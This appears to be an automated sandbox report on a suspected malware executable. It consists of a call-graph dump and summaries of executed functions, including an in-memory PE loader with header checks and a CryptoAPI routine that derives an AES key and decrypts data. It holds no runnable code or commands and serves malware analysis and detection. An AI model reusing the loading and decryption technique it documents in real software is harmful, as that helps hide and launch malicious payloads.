39 API calls 2 library calls 36853->37325 36854 405b92 36858 402200 25 API calls 36854->36858 36859 405b3d 36855->36859 37333 406eb0 39 API calls 2 library calls 36857->37333 36863 405b9a 36858->36863 37309 408440 27 API calls 36859->37309 36860 405c07 36869 4022d0 27 API calls 36860->36869 37314 408440 27 API calls 36863->37314 36866 405ce0 36870 4022d0 27 API calls 36866->36870 36867 405d9e 36871 4022d0 27 API calls 36867->36871 36868 405b49 37211 4016b0 36868->37211 36873 405c17 36869->36873 36874 405cf0 36870->36874 36875 405dae 36871->36875 37319 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 36873->37319 37326 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 36874->37326 36886 402200 25 API calls 36875->36886 36876 406136 37215 407c30 36876->37215 36880 405c20 36881 402200 25 API calls 36880->36881 36884 405c28 36881->36884 36882 405cf9 36885 402200 25 API calls 36882->36885 36883 40613f 36893 4022d0 27 API calls 36883->36893 37320 4068f0 39 API calls 2 library calls 36884->37320 36888 405d01 36885->36888 36889 405dc2 36886->36889 37327 406c10 39 API calls 2 library calls 36888->37327 36892 405ea9 36889->36892 37334 406f30 39 API calls 2 library calls 36889->37334 36890 405c2d 36901 4022d0 27 API calls 36890->36901 37344 4072d0 39 API calls 2 library calls 36892->37344 36897 406152 36893->36897 36895 405d06 36904 4022d0 27 API calls 36895->36904 37225 407bb0 36897->37225 36898 405eb3 36905 4022d0 27 API calls 36898->36905 36899 405dcf 36907 4022d0 27 API calls 36899->36907 36903 405c3d 36901->36903 36902 40615d 36908 4022d0 27 API calls 36902->36908 36913 402200 25 API calls 36903->36913 36906 405d16 36904->36906 36909 405ec3 36905->36909 37328 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 36906->37328 36911 405ddf 36907->36911 36912 406170 36908->36912 36925 402200 25 API calls 36909->36925 37335 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 36911->37335 37235 407b10 36912->37235 36918 405c51 36913->36918 36914 405d1f 36919 402200 25 API calls 36914->36919 36916 405de8 36921 402200 25 API calls 36916->36921 36923 405c72 36918->36923 36924 405c55 36918->36924 36920 405d27 36919->36920 37329 406c90 39 API calls 2 library calls 36920->37329 36927 405df0 36921->36927 36922 40617b 36939 4022d0 27 API calls 36922->36939 37322 406a00 39 API calls 2 library calls 36923->37322 37321 406980 39 API calls 2 library calls 36924->37321 36930 405ed7 36925->36930 37336 406fb0 39 API calls 2 library calls 36927->37336 36935 405f59 36930->36935 36936 405edb 36930->36936 36931 405d2c 36945 4022d0 27 API calls 36931->36945 36933 405c77 36946 4022d0 27 API calls 36933->36946 36934 405c5a 36944 4022d0 27 API calls 36934->36944 37351 4074f0 39 API calls 2 library calls 36935->37351 37345 407360 39 API calls 2 library calls 36936->37345 36938 405df5 36950 4022d0 27 API calls 36938->36950 36943 40618e 36939->36943 36941 405f5e 36953 4022d0 27 API calls 36941->36953 36942 405ee0 36954 4022d0 27 API calls 36942->36954 37245 408560 36943->37245 36948 405c6a 36944->36948 36949 405d3c 36945->36949 36951 405c87 36946->36951 37370 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 36948->37370 36964 402200 25 API calls 36949->36964 36955 405e05 36950->36955 36966 402200 25 API calls 36951->36966 36958 405f6e 36953->36958 36959 405ef0 36954->36959 37337 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 36955->37337 36974 402200 25 API calls 36958->36974 37346 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 36959->37346 36961 4061bb 37253 408670 36961->37253 36962 40611b 36968 402200 25 API calls 36962->36968 36970 405d50 36964->36970 36965 405e0e 36971 402200 25 API calls 36965->36971 36972 405c9b 36966->36972 36968->36868 36969 405ef9 36975 402200 25 API calls 36969->36975 36976 405d54 36970->36976 36977 405d5e 36970->36977 36978 405e16 36971->36978 36972->36868 37323 406a90 39 API calls 2 library calls 36972->37323 36981 405f82 36974->36981 36982 405f01 36975->36982 37330 406d20 39 API calls 2 library calls 36976->37330 37331 406da0 39 API calls 2 library calls 36977->37331 37338 407030 39 API calls 2 library calls 36978->37338 36979 4085c0 27 API calls 36980 4061e8 36979->36980 36988 408670 27 API calls 36980->36988 36989 406004 36981->36989 36990 405f86 36981->36990 37347 4073e0 39 API calls 2 library calls 36982->37347 36987 405d63 37001 4022d0 27 API calls 36987->37001 36993 4061fd 36988->36993 37358 407700 39 API calls 2 library calls 36989->37358 37352 407580 39 API calls 2 library calls 36990->37352 36992 405e1b 37000 4022d0 27 API calls 36992->37000 36997 4085c0 27 API calls 36993->36997 36996 405f06 37006 4022d0 27 API calls 36996->37006 37002 406215 36997->37002 36998 406009 37009 4022d0 27 API calls 36998->37009 36999 405f8b 37010 4022d0 27 API calls 36999->37010 37003 405e2b 37000->37003 37004 405d73 37001->37004 37005 402200 25 API calls 37002->37005 37339 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37003->37339 37020 402200 25 API calls 37004->37020 37008 406223 37005->37008 37011 405f16 37006->37011 37014 402200 25 API calls 37008->37014 37015 406019 37009->37015 37016 405f9b 37010->37016 37348 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37011->37348 37013 405e34 37019 402200 25 API calls 37013->37019 37021 40622e 37014->37021 37027 402200 25 API calls 37015->37027 37353 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37016->37353 37018 405f1f 37023 402200 25 API calls 37018->37023 37024 405e3c 37019->37024 37025 405d87 37020->37025 37026 402200 25 API calls 37021->37026 37022 405fa4 37028 402200 25 API calls 37022->37028 37029 405f27 37023->37029 37340 4070b0 39 API calls 2 library calls 37024->37340 37025->36868 37332 406e30 39 API calls 2 library calls 37025->37332 37031 406239 37026->37031 37032 40602d 37027->37032 37033 405fac 37028->37033 37349 407470 39 API calls 2 library calls 37029->37349 37037 402200 25 API calls 37031->37037 37038 406031 37032->37038 37039 406084 37032->37039 37354 407600 39 API calls 2 library calls 37033->37354 37035 405e41 37048 4022d0 27 API calls 37035->37048 37042 406244 37037->37042 37359 407790 39 API calls 2 library calls 37038->37359 37364 407910 39 API calls 2 library calls 37039->37364 37041 405f2c 37051 4022d0 27 API calls 37041->37051 37046 402200 25 API calls 37042->37046 37044 405fb1 37055 4022d0 27 API calls 37044->37055 37050 40624f 37046->37050 37047 406036 37058 4022d0 27 API calls 37047->37058 37052 405e51 37048->37052 37049 406089 37061 4022d0 27 API calls 37049->37061 37053 402200 25 API calls 37050->37053 37056 405f3c 37051->37056 37067 402200 25 API calls 37052->37067 37054 40625a 37053->37054 37057 402200 25 API calls 37054->37057 37059 405fc1 37055->37059 37350 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37056->37350 37063 406265 37057->37063 37064 406046 37058->37064 37355 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37059->37355 37062 406099 37061->37062 37077 402200 25 API calls 37062->37077 37069 402200 25 API calls 37063->37069 37360 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37064->37360 37066 405f45 37072 402200 25 API calls 37066->37072 37068 405e65 37067->37068 37073 405e6e 37068->37073 37341 407140 39 API calls 2 library calls 37068->37341 37113 406274 37069->37113 37071 405fca 37075 402200 25 API calls 37071->37075 37072->36868 37342 4071c0 39 API calls 2 library calls 37073->37342 37074 40604f 37079 402200 25 API calls 37074->37079 37080 405fd2 37075->37080 37081 4060ad 37077->37081 37083 406057 37079->37083 37356 407680 39 API calls 2 library calls 37080->37356 37081->36868 37365 407990 39 API calls 2 library calls 37081->37365 37082 405e78 37090 4022d0 27 API calls 37082->37090 37361 407810 39 API calls 2 library calls 37083->37361 37086 405fd7 37091 4022d0 27 API calls 37086->37091 37088 40605c 37094 4022d0 27 API calls 37088->37094 37089 4060b6 37098 4022d0 27 API calls 37089->37098 37093 405e88 37090->37093 37095 405fe7 37091->37095 37092 4062d9 Sleep 37092->37113 37103 402200 25 API calls 37093->37103 37096 40606c 37094->37096 37357 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37095->37357 37362 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37096->37362 37101 4060c6 37098->37101 37100 405ff0 37105 402200 25 API calls 37100->37105 37366 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37101->37366 37102 4022d0 27 API calls 37102->37113 37107 405e9c 37103->37107 37104 406075 37108 402200 25 API calls 37104->37108 37105->36868 37107->36868 37343 407250 39 API calls 2 library calls 37107->37343 37111 40607d 37108->37111 37109 4060cf 37112 402200 25 API calls 37109->37112 37363 407890 39 API calls 2 library calls 37111->37363 37116 4060d7 37112->37116 37113->37092 37113->37102 37114 4062e2 37113->37114 37121 4062d1 37113->37121 37118 402200 25 API calls 37114->37118 37367 407a10 39 API calls 2 library calls 37116->37367 37120 4062ea 37118->37120 37119 4060dc 37126 4022d0 27 API calls 37119->37126 37256 408490 37120->37256 37123 402200 25 API calls 37121->37123 37123->37092 37124 4062fe 37127 408490 27 API calls 37124->37127 37125 406082 37128 4022d0 27 API calls 37125->37128 37129 4060ec 37126->37129 37130 406317 37127->37130 37128->36948 37368 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37129->37368 37132 408490 27 API calls 37130->37132 37136 40632a 37132->37136 37133 4060f5 37134 402200 25 API calls 37133->37134 37135 4060fd 37134->37135 37369 407a90 39 API calls 2 library calls 37135->37369 37138 408490 27 API calls 37136->37138 37140 406352 37136->37140 37138->37140 37371 407cc0 39 API calls 2 library calls 37140->37371 37141 40635f 37142 4022d0 27 API calls 37141->37142 37143 40636f 37142->37143 37144 402200 25 API calls 37143->37144 37145 406383 37144->37145 37146 406420 37145->37146 37147 4016b0 27 API calls 37145->37147 37374 407e30 39 API calls 2 library calls 37146->37374 37149 40639e 37147->37149 37372 407d50 39 API calls 2 library calls 37149->37372 37150 406425 37153 4022d0 27 API calls 37150->37153 37152 4063a7 37155 4022d0 27 API calls 37152->37155 37154 406438 37153->37154 37156 402200 25 API calls 37154->37156 37158 4063b7 37155->37158 37157 40644f 37156->37157 37182 4064af 37157->37182 37375 407fa0 39 API calls 2 library calls 37157->37375 37163 4063e7 37158->37163 37164 4063d8 Sleep 37158->37164 37160 4037d0 39 API calls 37162 4064c0 37160->37162 37161 406460 37167 4022d0 27 API calls 37161->37167 37168 4022d0 27 API calls 37163->37168 37164->37158 37165 4063e5 37164->37165 37166 406409 37165->37166 37169 402200 25 API calls 37166->37169 37170 40646f 37167->37170 37171 4063fe 37168->37171 37172 406411 37169->37172 37376 407f20 39 API calls 2 library calls 37170->37376 37174 402200 25 API calls 37171->37174 37373 401710 CoUninitialize 37172->37373 37174->37166 37176 406483 37177 4022d0 27 API calls 37176->37177 37178 406492 37177->37178 37377 407ec0 39 API calls __Init_thread_footer 37178->37377 37180 4064a0 37181 4022d0 27 API calls 37180->37181 37181->37182 37182->37160 37378 40f188 37183->37378 37185 40560f 37186 40f042 37185->37186 37389 4111fd GetLastError 37186->37389 37190 4064fc 37189->37190 37198 40652e 37189->37198 37426 409170 6 API calls 37190->37426 37192 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37194 406540 37192->37194 37193 406506 37193->37198 37427 409482 28 API calls 37193->37427 37194->36777 37196 406524 37428 409126 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 37196->37428 37198->37192 37200 4022f3 37199->37200 37200->37200 37201 402470 27 API calls 37200->37201 37202 402305 37201->37202 37202->36781 37204 40220b 37203->37204 37205 402226 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37203->37205 37204->37205 37206 40c26f 25 API calls 37204->37206 37205->36785 37207 40224a 37206->37207 37208 402281 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37207->37208 37209 40c26f 25 API calls 37207->37209 37208->36785 37210 4022cc 37209->37210 37212 4016c3 __cftof 37211->37212 37213 409035 27 API calls 37212->37213 37214 4016da __cftof 37213->37214 37214->36876 37216 407c9e 37215->37216 37217 407c62 37215->37217 37219 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37216->37219 37429 409170 6 API calls 37217->37429 37221 407cb0 37219->37221 37220 407c6c 37220->37216 37430 409482 28 API calls 37220->37430 37221->36883 37223 407c94 37431 409126 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 37223->37431 37226 407c0e 37225->37226 37227 407bdc 37225->37227 37228 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37226->37228 37432 409170 6 API calls 37227->37432 37230 407c20 37228->37230 37230->36902 37231 407be6 37231->37226 37433 409482 28 API calls 37231->37433 37233 407c04 37434 409126 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 37233->37434 37236 407b92 37235->37236 37237 407b4d 37235->37237 37238 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37236->37238 37435 409170 6 API calls 37237->37435 37240 407ba5 37238->37240 37240->36922 37241 407b57 37241->37236 37436 409482 28 API calls 37241->37436 37243 407b88 37437 409126 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 37243->37437 37246 408572 37245->37246 37247 408a60 27 API calls 37246->37247 37248 4061a3 37247->37248 37249 4085c0 37248->37249 37250 4085d9 37249->37250 37251 4085ed __InternalCxxFrameHandler 37250->37251 37438 402740 27 API calls 3 library calls 37250->37438 37251->36961 37439 408880 37253->37439 37255 4061d0 37255->36979 37257 4084bb 37256->37257 37258 4084c2 37257->37258 37259 408514 37257->37259 37260 4084f5 37257->37260 37258->37124 37268 408509 __InternalCxxFrameHandler 37259->37268 37461 401600 27 API calls 3 library calls 37259->37461 37261 40854a 37260->37261 37262 4084fc 37260->37262 37462 401600 27 API calls 2 library calls 37261->37462 37460 401600 27 API calls 3 library calls 37262->37460 37266 408502 37267 40c26f 25 API calls 37266->37267 37266->37268 37269 408554 37267->37269 37268->37124 37270->36799 37271->36799 37272->36799 37273->36799 37275 408ae8 37274->37275 37278 408a7a __InternalCxxFrameHandler 37274->37278 37463 408b10 27 API calls 3 library calls 37275->37463 37277 408afa 37277->36799 37278->36799 37280 401db2 37279->37280 37280->37280 37281 402470 27 API calls 37280->37281 37282 401dc5 37281->37282 37283 402470 27 API calls 37282->37283 37284 401e8d __InternalCxxFrameHandler 37283->37284 37464 40c34c 37284->37464 37287 401fc3 37289 402062 37287->37289 37290 402033 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37287->37290 37288 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37291 402057 37288->37291 37292 40c26f 25 API calls 37289->37292 37290->37288 37291->36799 37293 402067 37292->37293 37294 401d60 39 API calls 37293->37294 37296 40f00b 23 API calls 37295->37296 37297 4037d7 37296->37297 37493 4082a0 27 API calls 3 library calls 37297->37493 37299 4038a1 37299->36807 37301 403844 37301->37299 37494 40f021 37 API calls _unexpected 37301->37494 37495 408740 27 API calls 3 library calls 37301->37495 37303->36814 37305->36797 37306->36815 37307->36833 37308->36851 37309->36868 37310->36800 37311->36812 37312->36834 37313->36854 37314->36868 37315->36791 37316->36829 37317->36845 37318->36860 37319->36880 37320->36890 37321->36934 37322->36933 37323->36934 37324->36825 37325->36866 37326->36882 37327->36895 37328->36914 37329->36931 37330->36934 37331->36987 37332->36857 37333->36867 37334->36899 37335->36916 37336->36938 37337->36965 37338->36992 37339->37013 37340->37035 37341->37073 37342->37082 37343->36892 37344->36898 37345->36942 37346->36969 37347->36996 37348->37018 37349->37041 37350->37066 37351->36941 37352->36999 37353->37022 37354->37044 37355->37071 37356->37086 37357->37100 37358->36998 37359->37047 37360->37074 37361->37088 37362->37104 37363->37125 37364->37049 37365->37089 37366->37109 37367->37119 37368->37133 37369->37125 37370->36962 37371->37141 37372->37152 37374->37150 37375->37161 37376->37176 37377->37180 37379 40f197 37378->37379 37381 40f1ac 37378->37381 37386 40c339 14 API calls __dosmaperr 37379->37386 37385 40f1a7 __alldvrm 37381->37385 37388 411df2 6 API calls _unexpected 37381->37388 37382 40f19c 37387 40c25f 25 API calls __cftof 37382->37387 37385->37185 37386->37382 37387->37385 37388->37385 37390 411214 37389->37390 37395 41121a 37389->37395 37418 411d71 6 API calls _unexpected 37390->37418 37393 411238 37394 411220 SetLastError 37393->37394 37396 41123c 37393->37396 37400 4112b4 37394->37400 37401 405618 Sleep 37394->37401 37395->37394 37419 411db0 6 API calls _unexpected 37395->37419 37420 411a65 14 API calls 2 library calls 37396->37420 37399 411248 37402 411250 37399->37402 37403 411267 37399->37403 37425 40fad9 37 API calls __FrameHandler3::FrameUnwindToState 37400->37425 37401->36769 37421 411db0 6 API calls _unexpected 37402->37421 37422 411db0 6 API calls _unexpected 37403->37422 37408 411273 37410 411277 37408->37410 37411 411288 37408->37411 37409 41125e 37412 411ac2 _free 14 API calls 37409->37412 37423 411db0 6 API calls _unexpected 37410->37423 37424 41102b 14 API calls _unexpected 37411->37424 37415 411264 37412->37415 37415->37394 37416 411293 37417 411ac2 _free 14 API calls 37416->37417 37417->37415 37418->37395 37419->37393 37420->37399 37421->37409 37422->37408 37423->37409 37424->37416 37426->37193 37427->37196 37428->37198 37429->37220 37430->37223 37431->37216 37432->37231 37433->37233 37434->37226 37435->37241 37436->37243 37437->37236 37438->37251 37440 4088c3 37439->37440 37441 408a50 37440->37441 37442 408990 37440->37442 37446 4088c8 __InternalCxxFrameHandler 37440->37446 37458 4016a0 27 API calls std::_Xinvalid_argument 37441->37458 37447 4089c5 37442->37447 37448 4089eb 37442->37448 37444 408a55 37459 401600 27 API calls 2 library calls 37444->37459 37446->37255 37447->37444 37450 4089d0 37447->37450 37455 4089dd __InternalCxxFrameHandler 37448->37455 37457 401600 27 API calls 3 library calls 37448->37457 37449 4089d6 37452 40c26f 25 API calls 37449->37452 37449->37455 37456 401600 27 API calls 3 library calls 37450->37456 37454 408a5f 37452->37454 37455->37255 37456->37449 37457->37455 37459->37449 37460->37266 37461->37268 37462->37266 37463->37277 37467 41144f 37464->37467 37468 411463 37467->37468 37469 411467 37468->37469 37472 4114a1 37468->37472 37485 401ed8 InternetOpenA 37468->37485 37469->37485 37486 40c339 14 API calls __dosmaperr 37469->37486 37471 411491 37487 40c25f 25 API calls __cftof 37471->37487 37488 40c369 37 API calls 2 library calls 37472->37488 37475 4114ad 37476 4114b7 37475->37476 37479 4114ce 37475->37479 37489 417a24 25 API calls 2 library calls 37476->37489 37478 411550 37478->37485 37490 40c339 14 API calls __dosmaperr 37478->37490 37479->37478 37480 4115a5 37479->37480 37480->37485 37492 40c339 14 API calls __dosmaperr 37480->37492 37483 411599 37491 40c25f 25 API calls __cftof 37483->37491 37485->37287 37486->37471 37487->37485 37488->37475 37489->37485 37490->37483 37491->37485 37492->37485 37493->37301 37494->37301 37495->37301 37497 40eeb7 37496->37497 37498 40eec9 37496->37498 37524 409906 GetModuleHandleW 37497->37524 37508 40ed50 37498->37508 37502 40eebc 37502->37498 37525 40ef4f GetModuleHandleExW 37502->37525 37503 4096cf 37503->36749 37507 40ef0c 37509 40ed5c __FrameHandler3::FrameUnwindToState 37508->37509 37531 40f28c RtlEnterCriticalSection 37509->37531 37511 40ed66 37532 40edbc 37511->37532 37513 40ed73 37536 40ed91 37513->37536 37516 40ef0d 37541 41366f GetPEB 37516->37541 37519 40ef3c 37522 40ef4f __FrameHandler3::FrameUnwindToState 3 API calls 37519->37522 37520 40ef1c GetPEB 37520->37519 37521 40ef2c GetCurrentProcess TerminateProcess 37520->37521 37521->37519 37523 40ef44 ExitProcess 37522->37523 37524->37502 37526 40ef91 37525->37526 37527 40ef6e GetProcAddress 37525->37527 37528 40eec8 37526->37528 37529 40ef97 FreeLibrary 37526->37529 37530 40ef83 37527->37530 37528->37498 37529->37528 37530->37526 37531->37511 37533 40edc8 __FrameHandler3::FrameUnwindToState 37532->37533 37535 40ee29 __FrameHandler3::FrameUnwindToState 37533->37535 37539 410940 14 API calls __FrameHandler3::FrameUnwindToState 37533->37539 37535->37513 37540 40f2d4 RtlLeaveCriticalSection 37536->37540 37538 40ed7f 37538->37503 37538->37516 37539->37535 37540->37538 37542 413689 37541->37542 37544 40ef17 37541->37544 37545 411c94 5 API calls _unexpected 37542->37545 37544->37519 37544->37520 37545->37544 36570 100079ee 36571 10007a2c 36570->36571 36575 100079fc _unexpected 36570->36575 36578 10005926 12 API calls __dosmaperr 36571->36578 36573 10007a17 RtlAllocateHeap 36574 10007a2a 36573->36574 36573->36575 36575->36571 36575->36573 36577 10005aed EnterCriticalSection LeaveCriticalSection _unexpected 36575->36577 36577->36575 36578->36574 37546 d99c06 37547 d99c15 37546->37547 37550 d9a3a6 37547->37550 37552 d9a3c1 37550->37552 37551 d9a3ca CreateToolhelp32Snapshot 37551->37552 37553 d9a3e6 Module32First 37551->37553 37552->37551 37552->37553 37554 d99c1e 37553->37554 37555 d9a3f5 37553->37555 37557 d9a065 37555->37557 37558 d9a090 37557->37558 37559 d9a0a1 VirtualAlloc 37558->37559 37560 d9a0d9 37558->37560 37559->37560

                                                                    Executed Functions

                                                                    Function 00402C70 Relevance: 35.5, APIs: 11, Strings: 9, Instructions: 504COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 402c70-402c92 1 402c94-402cbb SetLastError call 402920 call 408ec2 0->1 2 402cbc-402cc4 0->2 3 402cf1-402cff 2->3 4 402cc6 2->4 7 402d01-402d28 SetLastError call 402920 call 408ec2 3->7 8 402d29-402d36 3->8 6 402ccb-402cf0 call 402920 SetLastError call 408ec2 4->6 12 402d38-402d3d 8->12 13 402d3f-402d48 8->13 12->6 16 402d54-402d5a 13->16 17 402d4a-402d4f 13->17 20 402d66-402d73 16->20 21 402d5c-402d61 16->21 17->6 24 402d94-402db7 GetNativeSystemInfo 20->24 25 402d75 20->25 21->6 29 402dc3-402ddb VirtualAlloc 24->29 30 402db9-402dbe 24->30 28 402d77-402d92 25->28 28->24 28->28 31 402e03-402e1e GetProcessHeap HeapAlloc 29->31 32 402ddd-402ded VirtualAlloc 29->32 30->6 33 402e20-402e2d VirtualFree 31->33 34 402e34-402e7a 31->34 32->31 35 402def-402dfc call 402920 32->35 33->34 36 402e7c-402e7e SetLastError 34->36 37 402e9e-402ee6 VirtualAlloc call 40a3e0 34->37 35->31 39 402e84-402e9d call 4033d0 call 408ec2 36->39 45 402eec-402eef 37->45 46 402f9f-402fa8 37->46 50 402ef0-402ef5 45->50 47 40302d 46->47 48 402fae-402fb5 46->48 54 403032-40303e call 402a80 47->54 51 402fb7-402fb9 48->51 52 402fbb-402fcd 48->52 55 402ef7-402f03 50->55 56 402f38-402f40 50->56 51->54 52->47 57 402fcf 52->57 54->39 69 403044-403067 54->69 60 402f84-402f96 55->60 61 402f05-402f1f 55->61 56->36 58 402f46-402f59 call 402bf0 56->58 62 402fd0-402fe5 57->62 68 402f5b-402f60 58->68 60->50 64 402f9c 60->64 61->39 72 402f25-402f36 call 40aa10 61->72 66 402fe7-402fea 62->66 67 40301e-403028 62->67 64->46 73 402ff0-403001 66->73 67->62 75 40302a 67->75 68->39 74 402f66-402f7b call 40a3e0 68->74 70 403069-40306e 69->70 71 40307c-40309c 69->71 76 403070-403073 70->76 77 403075-403077 70->77 79 4030a2-4030a8 71->79 80 403165-403171 call 402950 71->80 89 402f7e-402f81 72->89 81 403003-40300b 73->81 82 40300e-40301c 73->82 74->89 75->47 76->71 77->71 84 403079 77->84 86 4030b0-4030c9 79->86 92 403176-403178 80->92 81->82 82->67 82->73 84->71 90 4030e3-4030e6 86->90 91 4030cb-4030ce 86->91 89->60 96 403123-40312f 90->96 97 4030e8-4030ef 90->97 93 4030d0-4030d3 91->93 94 4030d5-4030d8 91->94 92->39 95 40317e-40318a 92->95 100 4030dd-4030e0 93->100 94->90 101 4030da 94->101 102 4031b3-4031b8 95->102 103 40318c-403195 95->103 98 403131 96->98 99 403137-403140 96->99 104 403120 97->104 105 4030f1-4030f6 call 402950 97->105 98->99 108 403143-40315f 99->108 100->90 101->100 106 40320a-403223 call 408ec2 102->106 107 4031ba-4031c3 102->107 103->102 109 403197-40319b 103->109 104->96 112 4030fb-4030fd 105->112 113 4031f4-403209 call 408ec2 107->113 114 4031c5-4031ce 107->114 108->80 108->86 109->102 115 40319d 109->115 112->39 117 403103-40311e 112->117 123 4031d0 114->123 124 4031da-4031f3 call 408ec2 114->124 119 4031a0-4031af 115->119 117->108 125 4031b1 119->125 123->124 125->102
                                                                    APIs
                                                                    • SetLastError.KERNEL32(0000000D), ref: 00402C96
                                                                    • SetLastError.KERNEL32(000000C1), ref: 00402CD8
                                                                    Strings
                                                                    • @, xrefs: 00402C8F
                                                                    • DOS header is not valid!, xrefs: 00402CC6
                                                                    • ERROR_OUTOFMEMORY!, xrefs: 00402DEF
                                                                    • DOS header size is not valid!, xrefs: 00402D09
                                                                    • Size is not valid!, xrefs: 00402C9C
                                                                    • FileHeader.Machine != HOST_MACHINE!, xrefs: 00402D4A
                                                                    • alignedImageSize != AlignValueUp!, xrefs: 00402DB9
                                                                    • Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402D38
                                                                    • Section alignment invalid!, xrefs: 00402D5C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast
                                                                    • String ID: @$DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
                                                                    • API String ID: 1452528299-393758929
                                                                    • Opcode ID: a7ee295ea28172196232d939963434d58e5a2b4f3baf6ecdb48b764af0884dbc
                                                                    • Instruction ID: 68209fb506ae9b68e90255ee0055c9910cae7d9580854ddc7816d62818b51dcc
                                                                    • Opcode Fuzzy Hash: a7ee295ea28172196232d939963434d58e5a2b4f3baf6ecdb48b764af0884dbc
                                                                    • Instruction Fuzzy Hash: 3E129C71B002159BDB14CF98D985BAEBBB5BF48304F14416AE809BB3C1D7B8ED41CB98
                                                                    Function 004034C0 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 225encryptionCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 855 4034c0-403548 CryptAcquireContextW 856 40360a-403620 GetLastError CryptReleaseContext 855->856 857 40354e-40356c CryptCreateHash 855->857 858 403754-40375a 856->858 857->856 859 403572-403585 857->859 860 403784-4037a1 call 408ec2 858->860 861 40375c-403768 858->861 862 403588-40358d 859->862 863 40377a-403781 call 409027 861->863 864 40376a-403778 861->864 862->862 865 40358f-4035d6 call 409035 call 40e46b CryptHashData 862->865 863->860 864->863 867 4037a2-4037b5 call 40c26f 864->867 879 4035e6-403608 CryptDeriveKey 865->879 880 4035d8-4035e1 GetLastError 865->880 876 4037b7-4037be 867->876 877 4037c8 867->877 876->877 884 4037c0-4037c4 876->884 879->856 881 403625-403677 call 40e2bd call 40a3e0 call 409035 879->881 880->858 890 403748-40374e CryptDestroyKey 881->890 891 40367d-40368c 881->891 884->877 890->858 892 403692-40369b 891->892 893 4036a9-4036e4 call 40a3e0 CryptDecrypt 892->893 894 40369d-40369f 892->894 893->890 897 4036e6-403711 call 40a3e0 893->897 894->893 897->890 900 403713-403742 897->900 900->890 900->892
                                                                    APIs
                                                                    • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,6C8BF0E5), ref: 00403540
                                                                    • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403564
                                                                    • _mbstowcs.LIBCMT ref: 004035B7
                                                                    • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004035CE
                                                                    • GetLastError.KERNEL32 ref: 004035D8
                                                                    • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00403600
                                                                    • GetLastError.KERNEL32 ref: 0040360A
                                                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040361A
                                                                    • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004036DC
                                                                    • CryptDestroyKey.ADVAPI32(?), ref: 0040374E
                                                                    Strings
                                                                    • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040351C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease_mbstowcs
                                                                    • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
